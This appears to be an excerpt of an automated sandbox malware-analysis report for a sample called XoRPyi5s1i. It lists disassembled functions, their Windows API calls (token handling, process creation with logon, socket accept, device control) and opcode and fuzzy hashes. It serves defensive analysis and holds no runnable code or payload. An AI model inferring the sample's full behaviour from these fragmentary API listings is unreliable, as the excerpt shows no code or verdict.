                                    • Opcode Fuzzy Hash: 53f8bbf5efda47781187a1370de3b8cbd2865a9cbe54bf4969919b13b8b9eec4
                                    • Instruction Fuzzy Hash: C8210131200612BBEB19AF609C00FBBB7A9FF54704F00411ABA4596A50DF719A209FA0
                                    Function 0016AF64 Relevance: 6.1, APIs: 4, Instructions: 73processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0016AFAE
                                    • OpenProcessToken.ADVAPI32(00000000), ref: 0016AFB5
                                    • CloseHandle.KERNEL32(00000004), ref: 0016AFCF
                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0016AFFE
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                                    • String ID:
                                    • API String ID: 2621361867-0
                                    • Opcode ID: 608065b19e1373c8233b4dc3d9b4bcb3a12dc35cfbec0f5e7ca794d3f50a355b
                                    • Instruction ID: 127e68b4720014541bc04f10e35ff97b00ed5557bf70ae3451725968e083e3f2
                                    • Opcode Fuzzy Hash: 608065b19e1373c8233b4dc3d9b4bcb3a12dc35cfbec0f5e7ca794d3f50a355b
                                    • Instruction Fuzzy Hash: F12149B2104209ABDB069FA4ED49BEE7BA9AF44304F044165FA01A2161D376DD61EB62
                                    Function 00198A37 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetWindowLongW.USER32(?,000000EC), ref: 00198AA6
                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00198AC0
                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00198ACE
                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00198ADC
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Window$Long$AttributesLayered
                                    • String ID:
                                    • API String ID: 2169480361-0
                                    • Opcode ID: ec44b83a4a88ad5ce21647808dc3d831a0e1a060a56aee60df934fda54d89216
                                    • Instruction ID: 0a6e39f837937381496b523ccd0d7d5d489f3d1cf0bde5b38b063800d1dc5bad
                                    • Opcode Fuzzy Hash: ec44b83a4a88ad5ce21647808dc3d831a0e1a060a56aee60df934fda54d89216
                                    • Instruction Fuzzy Hash: C411B231305115AFDB08AB18DC45FBA77A9FF96320F144219F91AC72E2DB74BD408B94
                                    Function 00188A7F Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 00188AE0
                                    • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 00188AF2
                                    • accept.WS2_32(00000000,00000000,00000000), ref: 00188AFF
                                    • WSAGetLastError.WS2_32(00000000), ref: 00188B16
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ErrorLastacceptselect
                                    • String ID:
                                    • API String ID: 385091864-0
                                    • Opcode ID: b74004bb266c72d4565cf2ae8ff5a3b2fefcb0faaef9de6d6d89823dcaed8c40
                                    • Instruction ID: a1c54649de61ac56ec0d87d787497061762a9c3fe13f527118773d2aaa9b54cc
                                    • Opcode Fuzzy Hash: b74004bb266c72d4565cf2ae8ff5a3b2fefcb0faaef9de6d6d89823dcaed8c40
                                    • Instruction Fuzzy Hash: 6E21A872A001249FC7159F68DC85ADEBBFCEF5A314F004169F849D7250DB74DA818F90
                                    Function 00170AA6 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00171E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00170ABB,?,?,?,0017187A,00000000,000000EF,00000119,?,?), ref: 00171E77
                                      • Part of subcall function 00171E68: lstrcpyW.KERNEL32(00000000,?,?,00170ABB,?,?,?,0017187A,00000000,000000EF,00000119,?,?,00000000), ref: 00171E9D
                                      • Part of subcall function 00171E68: lstrcmpiW.KERNEL32(00000000,?,00170ABB,?,?,?,0017187A,00000000,000000EF,00000119,?,?), ref: 00171ECE
                                    • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0017187A,00000000,000000EF,00000119,?,?,00000000), ref: 00170AD4
                                    • lstrcpyW.KERNEL32(00000000,?,?,0017187A,00000000,000000EF,00000119,?,?,00000000), ref: 00170AFA
                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,0017187A,00000000,000000EF,00000119,?,?,00000000), ref: 00170B2E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: lstrcmpilstrcpylstrlen
                                    • String ID: cdecl
                                    • API String ID: 4031866154-3896280584
                                    • Opcode ID: fd42b6d11d02356f4a19d2874ade7754bd6f1f21f81b9e8a99a9b199996aff20
                                    • Instruction ID: 2c0467e80c7bc66afa581c9f82bcf42549ca26712b5c028cb1161aec56338d27
                                    • Opcode Fuzzy Hash: fd42b6d11d02356f4a19d2874ade7754bd6f1f21f81b9e8a99a9b199996aff20
                                    • Instruction Fuzzy Hash: D211963A100305EFDB269F34DC45D7A77B8FF49354B90816AE809CB260EB719951C7A1
                                    Function 00162F96 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 00162FB5
                                      • Part of subcall function 0015395C: __FF_MSGBANNER.LIBCMT ref: 00153973
                                      • Part of subcall function 0015395C: __NMSG_WRITE.LIBCMT ref: 0015397A
                                      • Part of subcall function 0015395C: RtlAllocateHeap.NTDLL(01730000,00000000,00000001), ref: 0015399F
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: AllocateHeap_free
                                    • String ID:
                                    • API String ID: 614378929-0
                                    • Opcode ID: 35188b0a476950d89a7b98b28d2a72101c8524b169477a5589e340c7f4c511dc
                                    • Instruction ID: 77edb87b8ad81d02a348661eeec8bba99dc7134c2d552a8a47bc5d1dfd627711
                                    • Opcode Fuzzy Hash: 35188b0a476950d89a7b98b28d2a72101c8524b169477a5589e340c7f4c511dc
                                    • Instruction Fuzzy Hash: 4F110A31509612EBDB363B70BC0566E3BA8BF24361F204525FC699E192DB30CD94C690
                                    Function 0014EB83 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 0014EBB2
                                      • Part of subcall function 001351AF: _memset.LIBCMT ref: 0013522F
                                      • Part of subcall function 001351AF: _wcscpy.LIBCMT ref: 00135283
                                      • Part of subcall function 001351AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00135293
                                    • KillTimer.USER32(?,00000001,?,?), ref: 0014EC07
                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0014EC16
                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 001A3C88
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                    • String ID:
                                    • API String ID: 1378193009-0
                                    • Opcode ID: 4e30c8ee4e867047ad585c569df6241f8a095c7f69eb59d0502b29e0f95135f1
                                    • Instruction ID: ebf21d5a04941660ca0ba15f41c547ebc93f4e12e1a4a300403a24d441134b78
                                    • Opcode Fuzzy Hash: 4e30c8ee4e867047ad585c569df6241f8a095c7f69eb59d0502b29e0f95135f1
                                    • Instruction Fuzzy Hash: AF212974904784AFE7379B28CC59BE7BFECAB06318F04048EF69E56241C7742A84CB51
                                    Function 0017058F Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 001705AC
                                    • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 001705C7
                                    • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 001705DD
                                    • FreeLibrary.KERNEL32(?), ref: 00170632
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                    • String ID:
                                    • API String ID: 3137044355-0
                                    • Opcode ID: 2907ed8a4d23fc38a2080d5ab48d4b6c9519c85b11a685df815dc1a8d7ad1a79
                                    • Instruction ID: ce5d6e0e4b38082b78e3fa69b8ef63a3d480aeccf6f73af7a30a76bb4dcd87dc
                                    • Opcode Fuzzy Hash: 2907ed8a4d23fc38a2080d5ab48d4b6c9519c85b11a685df815dc1a8d7ad1a79
                                    • Instruction Fuzzy Hash: 54218E71900309EFDB269F95EC98ADABBB8EF48700F00C56DF51A92450E770EA55DF60
                                    Function 00176713 Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00176733
                                    • _memset.LIBCMT ref: 00176754
                                    • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 001767A6
                                    • CloseHandle.KERNEL32(00000000), ref: 001767AF
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: CloseControlCreateDeviceFileHandle_memset
                                    • String ID:
                                    • API String ID: 1157408455-0
                                    • Opcode ID: 2c6817e110dbc3531fa7cefae5f3d8b2fd36065b7cd3e5a8565b93f54d864c4b
                                    • Instruction ID: f1f836479ee67087962731c385c3fb31eed9dba77fe038e213621f64b6710000
                                    • Opcode Fuzzy Hash: 2c6817e110dbc3531fa7cefae5f3d8b2fd36065b7cd3e5a8565b93f54d864c4b
                                    • Instruction Fuzzy Hash: C211CA759012287AE72057A5AC4DFABBABCEF44764F10429AF508E71D0D7744E808B64
                                    Function 0016B1CC Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0016AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0016AA79
                                      • Part of subcall function 0016AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0016AA83
                                      • Part of subcall function 0016AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0016AA92
                                      • Part of subcall function 0016AA62: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 0016AA99
                                      • Part of subcall function 0016AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0016AAAF
                                    • GetLengthSid.ADVAPI32(?,00000000,0016ADE4,?,?), ref: 0016B21B
                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0016B227
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0016B22E
                                    • CopySid.ADVAPI32(?,00000000,?), ref: 0016B247
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Heap$AllocateInformationProcessToken$CopyErrorLastLength
                                    • String ID:
                                    • API String ID: 259861997-0
                                    • Opcode ID: ee90e52da5eeb2c5963e724440b946bc50dd0c03e18da2e9283b507f6f67d4eb
                                    • Instruction ID: 47703e80f128aaf1ee365f37f13ead269cf97aa5391f0b29be56c95908da676a
                                    • Opcode Fuzzy Hash: ee90e52da5eeb2c5963e724440b946bc50dd0c03e18da2e9283b507f6f67d4eb
                                    • Instruction Fuzzy Hash: 29118F72A04205AFDB189F98DC95AAEB7E9EF85308B14802DE943E7210D731AE94CB10
                                    Function 0016B478 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0016B498
                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0016B4AA
                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0016B4C0
                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0016B4DB
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID:
                                    • API String ID: 3850602802-0
                                    • Opcode ID: 58d0ac103964cd4b24f97c913ef94af86813e74dafcea3cadd5e8115e1cdc509
                                    • Instruction ID: 6699f06f45ecee7b9d161aa5129aea370947343438104be77287529fe5b4a030
                                    • Opcode Fuzzy Hash: 58d0ac103964cd4b24f97c913ef94af86813e74dafcea3cadd5e8115e1cdc509
                                    • Instruction Fuzzy Hash: AE11487A900218FFDB11DFA8CC85E9DBBB8FB08700F204091EA05B7290DB71AE51DB94
                                    Function 0017732B Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentThreadId.KERNEL32 ref: 00177352
                                    • MessageBoxW.USER32(?,?,?,?), ref: 00177385
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0017739B
                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 001773A2
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                    • String ID:
                                    • API String ID: 2880819207-0
                                    • Opcode ID: a81a1c5ec5a38c6c7e493f5f1bd82cef58c729120a1872e1f16649bf854c9a8b
                                    • Instruction ID: 070f1541c6995ed9f06b5f6c37e32278f87da6dd6a55ce2048b2cf9ded3ef948
                                    • Opcode Fuzzy Hash: a81a1c5ec5a38c6c7e493f5f1bd82cef58c729120a1872e1f16649bf854c9a8b
                                    • Instruction Fuzzy Hash: C7110872A04204AFC7059B6CDC05AAE7BBDAB45310F044355F935D32A1E7708D4187A0
                                    Function 0014D17C Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0014D1BA
                                    • GetStockObject.GDI32(00000011), ref: 0014D1CE
                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 0014D1D8
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: CreateMessageObjectSendStockWindow
                                    • String ID:
                                    • API String ID: 3970641297-0
                                    • Opcode ID: 3ab9eeca52452c8feb871b252169ca8160280078c42f4e209725fdc6e055b808
                                    • Instruction ID: f63bf4d83584ca29d76573ce6a523f48b10b5c56eb04304d04217e166b655ff2
                                    • Opcode Fuzzy Hash: 3ab9eeca52452c8feb871b252169ca8160280078c42f4e209725fdc6e055b808
                                    • Instruction Fuzzy Hash: D611C072501509BFEF065FA0EC50EEABB69FF18768F050216FE0452060DB31DCA0DBA0
                                    Function 00164DF2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                    • String ID:
                                    • API String ID: 3016257755-0
                                    • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                    • Instruction ID: 97d6aecb8008300b3bd80a6f92acb42f3bb440d7f59e8790a9db524f4c18b937
                                    • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                    • Instruction Fuzzy Hash: B701483200014ABBCF165E88DC158EE3F23BB18350F598455FA2859131D33BCAB2EB81
                                    Function 00157452 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00157A0D: __getptd_noexit.LIBCMT ref: 00157A0E
                                    • __lock.LIBCMT ref: 0015748F
                                    • InterlockedDecrement.KERNEL32(?), ref: 001574AC
                                    • _free.LIBCMT ref: 001574BF
                                    • InterlockedIncrement.KERNEL32(017554D0), ref: 001574D7
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                    • String ID:
                                    • API String ID: 2704283638-0
